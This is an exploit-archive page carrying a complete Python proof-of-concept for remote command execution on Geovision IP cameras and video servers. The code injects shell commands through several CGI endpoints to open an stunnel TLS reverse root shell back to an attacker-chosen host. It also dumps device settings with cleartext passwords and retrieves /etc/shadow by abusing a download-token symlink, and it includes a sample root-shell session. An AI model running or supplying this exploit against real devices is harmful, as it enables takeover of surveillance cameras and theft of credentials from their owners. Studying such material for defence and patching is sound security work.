Geovision Inc. IP Camera / Video Server Remote Command Execution

2018.02.08
Credit: bashis
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

#!/usr/bin/env python2.7 # # [SOF] # # Geovision Inc. IP Camera & Video Server Remote Command Execution PoC # Researcher: bashis <mcw noemail eu> (November 2017) # ########################################################################################### # # 1. Pop stunnel TLSv1 reverse root shell [Local listener: 'ncat -vlp <LPORT> --ssl'; Verified w/ v7.60] # 2. Dump all settings of remote IPC with Login/Passwd in cleartext # Using: # - CGI: 'Usersetting.cgi' (Logged in user) < v3.12 (Very old) [Used as default] # - CGI: 'FilterSetting.cgi' (Logged in user) < v3.12 (Very old) # - CGI: 'PictureCatch.cgi' (Anonymous) > v3.10 # - CGI: 'JpegStream.cgi' (Anonymous) > v3.10 # 3. GeoToken PoC to login and download /etc/shadow via generated token symlink # # Sample reverse shell: # $ ncat -vlp 1337 --ssl # Ncat: Version 7.60 ( https://nmap.org/ncat ) # Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. # Ncat: SHA-1 fingerprint: 3469 C118 43F0 043A 5168 189B 1D67 1131 4B5B 1603 # Ncat: Listening on :::1337 # Ncat: Listening on 0.0.0.0:1337 # Ncat: Connection from 192.168.57.20. # Ncat: Connection from 192.168.57.20:16945. # /bin/sh: can't access tty; job control turned off # /www # id # id # uid=0(root) gid=0(root) # /www # uname -a # uname -a # Linux IPCAM 2.6.18_pro500-davinci #1 Mon Jun 19 21:27:10 CST 2017 armv5tejl unknown # /www # exit # $ ############################################################################################ import sys import socket import urllib, urllib2, httplib import json import hashlib import commentjson # pip install commentjson import xmltodict # pip install xmltodict import select import string import argparse import random import base64 import ssl import json import os import re #from pwn import * def split2len(s, n): def _f(s, n): while s: yield s[:n] s = s[n:] return list(_f(s, n)) # Ignore download of '302 Found/Location' redirections class NoRedirection(urllib2.HTTPErrorProcessor): def http_response(self, request, response): return response https_response = http_response class HTTPconnect: def __init__(self, host, proto, verbose, credentials, Raw, noexploit): self.host = host self.proto = proto self.verbose = verbose self.credentials = credentials self.Raw = Raw self.noexploit = False self.noexploit = noexploit def Send(self, uri, query_headers, query_data, ID): self.uri = uri self.query_headers = query_headers self.query_data = query_data self.ID = ID # Connect-timeout in seconds timeout = 10 socket.setdefaulttimeout(timeout) url = '{}://{}{}'.format(self.proto, self.host, self.uri) if self.verbose: print "[Verbose] Sending:", url if self.proto == 'https': if hasattr(ssl, '_create_unverified_context'): print "[i] Creating SSL Unverified Context" ssl._create_default_https_context = ssl._create_unverified_context if self.credentials: Basic_Auth = self.credentials.split(':') if self.verbose: print "[Verbose] User:",Basic_Auth[0],"password:",Basic_Auth[1] try: pwd_mgr = urllib2.HTTPpasswordMgrWithDefaultDahua_realm() pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1]) auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr) if verbose: http_logger = urllib2.HTTPHandler(debuglevel = 1) # HTTPSHandler... for HTTPS opener = urllib2.build_opener(auth_handler,NoRedirection,http_logger) else: opener = urllib2.build_opener(auth_handler,NoRedirection) urllib2.install_opener(opener) except Exception as e: print "[!] Basic Auth Error:",e sys.exit(1) else: # Don't follow redirects! if verbose: http_logger = urllib2.HTTPHandler(debuglevel = 1) opener = urllib2.build_opener(http_logger,NoRedirection) urllib2.install_opener(opener) else: NoRedir = urllib2.build_opener(NoRedirection) urllib2.install_opener(NoRedir) if self.noexploit and not self.verbose: print "[<] 204 Not Sending!" html = "Not sending any data" return html else: if self.query_data: req = urllib2.Request(url, data=urllib.urlencode(self.query_data,doseq=True), headers=self.query_headers) if self.ID: Cookie = 'CLIENT_ID={}'.format(self.ID) req.add_header('Cookie', Cookie) else: req = urllib2.Request(url, None, headers=self.query_headers) if self.ID: Cookie = 'CLIENT_ID={}'.format(self.ID) req.add_header('Cookie', Cookie) rsp = urllib2.urlopen(req) if rsp: print "[<] {}".format(rsp.code) if self.Raw: return rsp else: html = rsp.read() return html # # Validate correctness of HOST, IP and PORT # class Validate: def __init__(self,verbose): self.verbose = verbose # Check if IP is valid def CheckIP(self,IP): self.IP = IP ip = self.IP.split('.') if len(ip) != 4: return False for tmp in ip: if not tmp.isdigit(): return False i = int(tmp) if i < 0 or i > 255: return False return True # Check if PORT is valid def Port(self,PORT): self.PORT = PORT if int(self.PORT) < 1 or int(self.PORT) > 65535: return False else: return True # Check if HOST is valid def Host(self,HOST): self.HOST = HOST try: # Check valid IP socket.inet_aton(self.HOST) # Will generate exeption if we try with DNS or invalid IP # Now we check if it is correct typed IP if self.CheckIP(self.HOST): return self.HOST else: return False except socket.error as e: # Else check valid DNS name, and use the IP address try: self.HOST = socket.gethostbyname(self.HOST) return self.HOST except socket.error as e: return False class Geovision: def __init__(self, rhost, proto, verbose, credentials, raw_request, noexploit, headers, SessionID): self.rhost = rhost self.proto = proto self.verbose = verbose self.credentials = credentials self.raw_request = raw_request self.noexploit = noexploit self.headers = headers self.SessionID = SessionID def Login(self): try: print "[>] Requesting keys from remote" URI = '/ssi.cgi/Login.htm' response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,None,None) response = response.read()[:1500] response = re.split('[()<>?"\n_&;/ ]',response) # print response except Exception as e: print "[!] Can't access remote host... ({})".format(e) sys.exit(1) try: # # Geovision way to have MD5 random Login and Password # CC1 = '' CC2 = '' for check in range(0,len(response)): if response[check] == 'cc1=': CC1 = response[check+1] print "[i] Random key CC1: {}".format(response[check+1]) elif response[check] == 'cc2=': CC2 = response[check+1] print "[i] Random key CC2: {}".format(response[check+1]) """ # # Less interesting to know, but leave it here anyway. # # If the remote server has enabled guest view, these below will not be '0' elif response[check] == 'GuestIdentify': print "[i] GuestIdentify: {}".format(response[check+2]) elif response[check] == 'uid': if response[check+2]: print "[i] uid: {}".format(response[check+2]) else: print "[i] uid: {}".format(response[check+3]) elif response[check] == 'pid': if response[check+2]: print "[i] pid: {}".format(response[check+2]) else: print "[i] pid: {}".format(response[check+3]) """ if not CC1 and not CC2: print "[!] CC1 and CC2 missing!" print "[!] Cannot generate MD5, exiting.." sys.exit(0) # # Geovision MD5 Format # uMD5 = hashlib.md5(CC1 + username + CC2).hexdigest().upper() pMD5 = hashlib.md5(CC2 + password + CC1).hexdigest().upper() # print "[i] User MD5: {}".format(uMD5) # print "[i] Pass MD5: {}".format(pMD5) self.query_args = { "username":"", "password":"", "Apply":"Apply", "umd5":uMD5, "pmd5":pMD5, "browser":1, "is_check_OCX_OK":0 } print "[>] Logging in" URI = '/LoginPC.cgi' response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID) # print response.info() # if we don't get 'Set-Cookie' back from the server, the Login has failed if not (response.info().get('Set-Cookie')): print "[!] Login Failed!" sys.exit(1) if verbose: print "Cookie: {}".format(response.info().get('Set-Cookie')) return response.info().get('Set-Cookie') except Exception as e: print "[i] What happen? ({})".format(e) exit(0) def DeviceInfo(self): try: URI = '/PSIA/System/deviceInfo' response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,None,None) deviceinfo = xmltodict.parse(response) print "[i] Remote target: {} ({})".format(deviceinfo['DeviceInfo']['model'],deviceinfo['DeviceInfo']['firmwareVersion']) return True except Exception as e: print "[i] Info about remote target failed ({})".format(e) return False def UserSetting(self,DumpSettings): self.DumpSettings = DumpSettings if self.DumpSettings: print "[i] Dump Config of remote" SH_CMD = '`echo "<!--#include file="SYS_CFG"-->" >/var/www/tmp/Login.htm`' else: print "[i] Launching TLSv1 privacy reverse shell" self.headers = { 'Connection': 'close', 'Accept-Language' : 'en-US,en;q=0.8', 'Cache-Control' : 'max-age=0', 'User-Agent':'Mozilla', 'Accept':'client=yes\\x0apty=yes\\x0asslVersion=TLSv1\\x0aexec=/bin/sh\\x0a' } SH_CMD = ';echo -en \"$HTTP_ACCEPT connect=LHOST:LPORT\"|stunnel -fd 0;' SH_CMD = SH_CMD.replace("LHOST",lhost) SH_CMD = SH_CMD.replace("LPORT",lport) print "[>] Pwning Usersetting.cgi" self.query_args = { "umd5":SH_CMD, "pmd5":"GEOVISION", "nmd5":"PWNED", "cnt5":"", "username":"", "passwordOld":"", "passwordNew":"", "passwordRetype":"", "btnSubmitAdmin":"1", "submit":"Apply" } try: URI = '/UserSetting.cgi' response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID) if DumpSettings: print "[i] Dumping" URI = '/ssi.cgi/tmp/Login.htm' response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,None,self.SessionID) print response return True except Exception as e: if str(e) == "timed out" or str(e) == "('The read operation timed out',)": print "[!] Enjoy the shell... ({})".format(e) return True def PictureCatch(self,DumpSettings): self.DumpSettings = DumpSettings if self.DumpSettings: print "[i] Dump Config of remote" SH_CMD = '`echo "<!--#include file="SYS_CFG"-->" >/var/www/tmp/Login.htm`' else: print "[i] Launching TLSv1 privacy reverse shell" self.headers = { 'Connection': 'close', 'Accept-Language' : 'en-US,en;q=0.8', 'Cache-Control' : 'max-age=0', 'User-Agent':'Mozilla', 'Accept':'client=yes\\x0apty=yes\\x0asslVersion=TLSv1\\x0aexec=/bin/sh\\x0a' } SH_CMD = ';echo -en \"$HTTP_ACCEPT connect=LHOST:LPORT\"|stunnel -fd 0;' SH_CMD = SH_CMD.replace("LHOST",lhost) SH_CMD = SH_CMD.replace("LPORT",lport) print "[>] Pwning PictureCatch.cgi" self.query_args = { "username":SH_CMD, "password":"GEOVISION", "attachment":"1", "channel":"1", "secret":"1", "key":"PWNED" } try: URI = '/PictureCatch.cgi' response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID) if DumpSettings: print "[i] Dumping" URI = '/ssi.cgi/tmp/Login.htm' response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,None,self.SessionID) print response return True except Exception as e: if str(e) == "timed out" or str(e) == "('The read operation timed out',)": print "[!] Enjoy the shell... ({})".format(e) return True def JpegStream(self,DumpSettings): self.DumpSettings = DumpSettings if self.DumpSettings: print "[i] Dump Config of remote" SH_CMD = '`echo "<!--#include file="SYS_CFG"-->" >/var/www/tmp/Login.htm`' else: print "[i] Launching TLSv1 privacy reverse shell" self.headers = { 'Connection': 'close', 'Accept-Language' : 'en-US,en;q=0.8', 'Cache-Control' : 'max-age=0', 'User-Agent':'Mozilla', 'Accept':'client=yes\\x0apty=yes\\x0asslVersion=TLSv1\\x0aexec=/bin/sh\\x0a' } SH_CMD = ';echo -en \"$HTTP_ACCEPT connect=LHOST:LPORT\"|stunnel -fd 0;' SH_CMD = SH_CMD.replace("LHOST",lhost) SH_CMD = SH_CMD.replace("LPORT",lport) print "[>] Pwning JpegStream.cgi" self.query_args = { "username":SH_CMD, "password":"GEOVISION", "attachment":"1", "channel":"1", "secret":"1", "key":"PWNED" } try: URI = '/JpegStream.cgi' response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID) if DumpSettings: print "[i] Dumping" URI = '/ssi.cgi/tmp/Login.htm' response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,None,self.SessionID) print response return True except Exception as e: if str(e) == "timed out" or str(e) == "('The read operation timed out',)": print "[!] Enjoy the shell... ({})".format(e) return True # # Interesting example of bad code and insufficent sanitation of user input. # ';' is filtered in v3.12, and when found in the packet, the packet is simply ignored. # # Later in the chain the Geovision code will write provided userinput to flash, we may overwrite unwanted flash area if we playing to much here. # So, we are limited to 31 char per line (32 MUST BE NULL), to play safe game with this bug. # # v3.10->3.12 changed how to handle ipfilter # From: # User input to system() call in FilterSetting.cgi to set iptable rules and then save them in flash # To: # User input transferred from 'FilterSetting.cgi' to flash (/dev/mtd11), and when the tickbox to activate the filter rules, # '/usr/local/bin/geobox-iptables-reload' is triggered to read these rules from flash and '/usr/local/bin/iptables' via 'geo_net_filter_table_add' # with system() call in 'libgeo_net.so' # # Should end up into; # 23835 root 576 S sh -c /usr/local/bin/iptables -A INPUT -s `/usr/loca...[trunkated] # 23836 root 2428 S /usr/local/bin/stunnel /tmp/x # 23837 root 824 S /bin/sh def FilterSetting(self): try: print "[>] Pwning FilterSetting.cgi" # # ';' will be treated by the code as LF # # Let's use some TLSv1 privacy for the reverse shell # SH_CMD = 'client=yes;connect=LHOST:LPORT;exec=/bin/sh;pty=yes;sslVersion=TLSv1' # SH_CMD = SH_CMD.replace("LHOST",lhost) SH_CMD = SH_CMD.replace("LPORT",lport) ShDict = SH_CMD.split(';') MAX_SIZE = 31 # Max Size of the strings to generate LF = 0 LINE = 0 CMD = {} CMD_NO_LF = "`echo -n \"TMP\">>/tmp/x`" CMD_DO_LF = "`echo \"TMP\">>/tmp/x`" SIZE = MAX_SIZE-(len(CMD_NO_LF)-3) # Size of availible space for our input in 'SH_CMD' # Remove, just in case CMD[LINE] = "`rm -f /tmp/x`" URI = '/FilterSetting.cgi' # # This loop will make the correct aligment of user input # for cmd in range(0,len(ShDict)): CMD_LF = math.ceil(float(len(ShDict[cmd])) / SIZE) cmd_split = split2len(ShDict[cmd], SIZE) for CMD_LEN in range(0,len(cmd_split)): LINE += 1 LF += 1 if (len(cmd_split[CMD_LEN]) > SIZE-1) and (CMD_LF != LF): CMD[LINE] = CMD_NO_LF.replace("TMP",cmd_split[CMD_LEN]) else: CMD[LINE] = CMD_DO_LF.replace("TMP",cmd_split[CMD_LEN]) LF = 0 if verbose: print "Len: {} {}".format(len(CMD[LINE]),CMD[LINE]) # Add two more commands to execute stunnel and remove /tmp/x CMD[LINE+1] = "`/usr/local/bin/stunnel /tmp/x`" # 31 char, no /usr/local/bin in $PATH CMD[LINE+2] = "`rm -f /tmp/x`" # Some bug here, think it is timing as below working CMD[LINE+3] = "`rm -f /tmp/x`" # Working, this is only one more add/enable/disable/remove loop # # Below while() loop will create following /tmp/x, execute 'stunnel' and remove /tmp/x # # client=yes # connect=<LHOST>:<LPORT> # exec=/bin/sh # pty=yes # sslVersion=TLSv1 # NEW_IP_FILTER = 1 # > v3.12 CMD_LEN = 0 who = 0 # Clean up to make room, just in case for Remove in range(0,4): print "[>] Cleaning ipfilter entry: {}".format(Remove+1) self.query_args = { "bPolicy":"0", # 1 = Enable, 0 = Disable "Delete":"Remove", # Remove entry "szIpAddr":"", "byOpId":"0", # 0 = Allow, 1 = Deny "dwSelIndex":"0", } response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID) while True: if who == len(CMD): break if CMD_LEN < 4: print "[>] Sending: {} ({})".format(CMD[who],len(CMD[who])) self.query_args = { "szIpAddr":CMD[who], # 31 char limit "byOpId":"0", # 0 = Allow, 1 = Deny "dwSelIndex":"0", # Seems not to be in use "Add":"Apply" } response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID) response = re.split('[()<>?"\n_&;/ ]',response) print response if NEW_IP_FILTER: for cnt in range(0,len(response)): if response[cnt] == 'iptables': NEW_IP_FILTER = 0 print "[i] Remote don't need Enable/Disable" break CMD_LEN += 1 who += 1 time.sleep(2) # Seems to be too fast without # NEW Way elif NEW_IP_FILTER: print "[>] Enabling ipfilter" self.query_args = { "bPolicy":"1", # 1 = Enable, 0 = Disable "szIpAddr":"", "byOpId":"0", # 0 = Allow, 1 = Deny "dwSelIndex":"0", } response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID) print "[i] Sleeping..." time.sleep(5) print "[>] Disabling ipfilter" self.query_args = { "szIpAddr":"", "byOpId":"0", "dwSelIndex":"0", } response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID) for Remove in range(0,4): print "[>] Deleting ipfilter Entry: {}".format(Remove+1) self.query_args = { "bPolicy":"0", # 1 = Enable, 0 = Disable "Delete":"Remove", "szIpAddr":"", "byOpId":"0", "dwSelIndex":"0", } response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID) CMD_LEN = 0 # OLD Way else: for Remove in range(0,4): print "[>] Deleting ipfilter Entry: {}".format(Remove+1) self.query_args = { "bPolicy":"0", # 1 = Enable, 0 = Disable "Delete":"Remove", "szIpAddr":"", "byOpId":"0", "dwSelIndex":"0", } response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID) CMD_LEN = 0 if NEW_IP_FILTER: print "[i] Last sending" print "[>] Enabling ipfilter" self.query_args = { "bPolicy":"1", # 1 = Enable, 0 = Disable "szIpAddr":"", "byOpId":"0", # 0 = Allow, 1 = Deny "dwSelIndex":"0", } response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID) print "[i] Sleeping..." time.sleep(5) print "[>] Disabling ipfilter" self.query_args = { "szIpAddr":"", "byOpId":"0", "dwSelIndex":"0", } response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID) for Remove in range(0,4): print "[>] Deleting ipfilter Entry: {}".format(Remove+1) self.query_args = { "bPolicy":"0", # 1 = Enable, 0 = Disable "Delete":"Remove", "szIpAddr":"", "byOpId":"0", "dwSelIndex":"0", } response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID) print "[!] Enjoy the shell... " return True except Exception as e: if not NEW_IP_FILTER: print "[i] Last sending" for Remove in range(0,4): print "[>] Deleting ipfilter Entry: {}".format(Remove+1) self.query_args = { "bPolicy":"0", # 1 = Enable, 0 = Disable "Delete":"Remove", "szIpAddr":"", "byOpId":"0", "dwSelIndex":"0", } response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID) print "[!] Enjoy the shell... " return True print "[!] Hmm... {}".format(e) print response.read() return True def GeoToken(self): print "[i] GeoToken PoC to login and download /etc/shadow via token symlink" print "[!] You must have valid login and password to generate the symlink" try: ######################################################################################### # This is how to list remote *.wav and *.avi files in /storage. """ print "[>] Requesting token1" URI = '/BKCmdToken.php' response = HTTPconnect(rhost,proto,verbose,credentials,raw_request,noexploit).Send(URI,headers,None,None) result = json.load(response) if verbose: print json.dumps(result,sort_keys=True,indent=4, separators=(',', ': ')) print "[i] Request OK?: {}".format(result['success']) if not result['success']: sys.exit(1) token1 = result['token'] # # SAMPLE OUTPUT # #{ # "success": true, # "token": "6fe1a7c1f34431acc7eaecba646b7caf" #} # # Generate correct MD5 token2 token2 = hashlib.md5(hashlib.md5(token1 + 'gEo').hexdigest() + 'vIsIon').hexdigest() query_args = { "token1":token1, "token2":token2 } print "[>] List files" URI = '/BKFileList.php' response = HTTPconnect(rhost,proto,verbose,credentials,raw_request,noexploit).Send(URI,headers,query_args,None) result = json.load(response) if verbose: print json.dumps(result,sort_keys=True,indent=4, separators=(',', ': ')) for who in result.keys(): print len(who) # # SAMPLE OUTPUT # #{ # "files": [ # { # "file_size": "2904170", # "filename": "event20171105104946001.avi", # "remote_path": "/storage/hd11-1/GV-MFD1501-0a99a9/cam01/2017/11/05" # }, # {} # ] #} ######################################################################################### """ # Request remote MD5 token1 print "[>] Requesting token1" URI = '/BKCmdToken.php' response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,None,None) result = json.load(response) if verbose: print json.dumps(result,sort_keys=True,indent=4, separators=(',', ': ')) print "[i] Request OK?: {}".format(result['success']) if not result['success']: return False token1 = result['token'] # # SAMPLE OUTPUT #{ # "success": true, # "token": "6fe1a7c1f34431acc7eaecba646b7caf" #} # # # Generate correct MD5 token2 # # MD5 Format: <login>:<token1>:<password> # token2 = hashlib.md5(username + ':' + token1 + ':' + password).hexdigest() # # symlink this file for us # filename = '/etc/shadow' self.query_args = { "token1":token1, "token2":token2, "filename":filename } print "[>] Requesting download file link" URI = '/BKDownloadLink.cgi' response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,None) response = response.read()#[:900] response = response.replace("'", "\"") result = json.loads(response) print "[i] Request OK?: {}".format(result['success']) if not result['success']: return False if verbose: print json.dumps(result,sort_keys=True,indent=4, separators=(',', ': ')) # # SAMPLE OUTPUT # #{ # "dl_folder": "/tmp", # "dl_token": "C71689493825787.dltoken", # "err_code": 0, # "success": true #} # URI = '/ssi.cgi' + result['dl_folder'] + '/' + result['dl_token'] print "[>] downloading ({}) with ({})".format(filename,URI) response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,None) response = response.read() print response return True except Exception as e: print "[i] GEO Token fail ({})".format(e) return False if __name__ == '__main__': # # Help, info and pre-defined values # INFO = '[Geovision Inc. IPC/IPV RCE PoCs (2017 bashis <mcw noemail eu>)]\n' HTTP = "http" HTTPS = "https" proto = HTTP verbose = False noexploit = False raw_request = True rhost = '192.168.57.20' # Default Remote HOST rport = '80' # Default Remote PORT lhost = '192.168.57.1' # Default Local HOST lport = '1337' # Default Local PORT # creds = 'root:pass' credentials = False # # Geovision stuff # SessionID = str(int(random.random() * 100000)) DumpSettings = False deviceinfo = False GEOtoken = False anonymous = False filtersetting = False usersetting = False jpegstream = False picturecatch = False # Geovision default username = 'admin' password = 'admin' # # Try to parse all arguments # try: arg_parser = argparse.ArgumentParser( prog=sys.argv[0], description=('[*] '+ INFO +' [*]')) arg_parser.add_argument('--rhost', required=True, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']') arg_parser.add_argument('--rport', required=True, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']') arg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']') arg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']') arg_parser.add_argument('--autoip', required=False, default=False, action='store_true', help='Detect External Connect Back IP [Default: False]') arg_parser.add_argument('--deviceinfo', required=False, default=False, action='store_true', help='Request model and firmware version') arg_parser.add_argument('-g','--geotoken', required=False, default=False, action='store_true', help='Try retrieve /etc/shadow with geotoken') arg_parser.add_argument('-a','--anonymous', required=False, default=False, action='store_true', help='Try pwning as anonymous') arg_parser.add_argument('-f','--filtersetting', required=False, default=False, action='store_true', help='Try pwning with FilterSetting.cgi') arg_parser.add_argument('-p','--picturecatch', required=False, default=False, action='store_true', help='Try pwning with PictureCatch.cgi') arg_parser.add_argument('-j','--jpegstream', required=False, default=False, action='store_true', help='Try pwning with JpegStream.cgi') arg_parser.add_argument('-u','--usersetting', required=False, default=False, action='store_true', help='Try pwning with UserSetting.cgi') arg_parser.add_argument('-d','--dump', required=False, default=False, action='store_true', help='Try pwning remote config') arg_parser.add_argument('--username', required=False, help='Username [Default: '+ username +']') arg_parser.add_argument('--password', required=False, help='password [Default: '+ password +']') if credentials: arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ credentials + ']') arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]') arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]') arg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]') args = arg_parser.parse_args() except Exception as e: print INFO,"\nError: {}\n".format(str(e)) sys.exit(1) print "\n[*]",INFO if args.verbose: verbose = args.verbose # # Check validity, update if needed, of provided options # if args.https: proto = HTTPS if not args.rport: rport = '443' if credentials and args.auth: credentials = args.auth if args.geotoken: GEOtoken = args.geotoken if args.anonymous: anonymous = True if args.deviceinfo: deviceinfo = True if args.dump: DumpSettings = True if args.filtersetting: FilterSetting = True if args.usersetting: usersetting = True if args.jpegstream: jpegstream = True if args.picturecatch: picturecatch = True if args.username: username = args.username if args.password: password = args.password if args.noexploit: noexploit = args.noexploit if args.rport: rport = args.rport if args.rhost: rhost = args.rhost IP = args.rhost if args.lport: lport = args.lport if args.lhost: lhost = args.lhost elif args.autoip: # HTTP check of our external IP try: headers = { 'Connection': 'close', 'Accept' : 'gzip, deflate', 'Accept-Language' : 'en-US,en;q=0.8', 'Cache-Control' : 'max-age=0', 'User-Agent':'Mozilla' } print "[>] Trying to find out my external IP" lhost = HTTPconnect("whatismyip.akamai.com",proto,verbose,credentials,False,noexploit).Send("/",headers,None,None) if verbose: print "[Verbose] Detected my external IP:",lhost except Exception as e: print "[<] ",e sys.exit(1) # Check if RPORT is valid if not Validate(verbose).Port(rport): print "[!] Invalid RPORT - Choose between 1 and 65535" sys.exit(1) # Check if RHOST is valid IP or FQDN, get IP back rhost = Validate(verbose).Host(rhost) if not rhost: print "[!] Invalid RHOST" sys.exit(1) # Check if LHOST is valid IP or FQDN, get IP back lhost = Validate(verbose).Host(lhost) if not lhost: print "[!] Invalid LHOST" sys.exit(1) # Check if RHOST is valid IP or FQDN, get IP back rhost = Validate(verbose).Host(rhost) if not rhost: print "[!] Invalid RHOST" sys.exit(1) # # Validation done, start print out stuff to the user # if args.https: print "[i] HTTPS / SSL Mode Selected" print "[i] Remote target IP:",rhost print "[i] Remote target PORT:",rport if not args.geotoken and not args.dump and not args.deviceinfo: print "[i] Connect back IP:",lhost print "[i] Connect back PORT:",lport rhost = rhost + ':' + rport headers = { 'Connection': 'close', 'Content-Type' : 'application/x-www-form-urlencoded', 'Accept' : 'gzip, deflate', 'Accept-Language' : 'en-US,en;q=0.8', 'Cache-Control' : 'max-age=0', 'User-Agent':'Mozilla' } # Print Model and Firmware version Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).DeviceInfo() if deviceinfo: sys.exit(0) # Geovision token login within the function # if GEOtoken: Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).DeviceInfo() if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).GeoToken(): print "[!] Failed" sys.exit(1) else: sys.exit(0) if anonymous: if jpegstream: if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).JpegStream(DumpSettings): print "[!] Failed" sys.exit(0) elif picturecatch: if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).PictureCatch(DumpSettings): print "[!] Failed" sys.exit(0) else: print "[!] Needed: --anonymous [--picturecatch | --jpegstream]" sys.exit(1) else: # # Geovision Login needed # if usersetting: if Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).Login(): if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).UserSetting(DumpSettings): print "[!] Failed" sys.exit(0) elif filtersetting: if Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).Login(): if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).FilterSetting(): print "[!] Failed" sys.exit(0) elif jpegstream: if Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).Login(): if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).JpegStream(DumpSettings): print "[!] Failed" sys.exit(0) elif picturecatch: if Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).Login(): if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).PictureCatch(DumpSettings): print "[!] Failed" sys.exit(0) else: print "[!] Needed: --usersetting | --jpegstream | --picturecatch | --filtersetting" sys.exit(1) sys.exit(0) # # [EOF] #


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top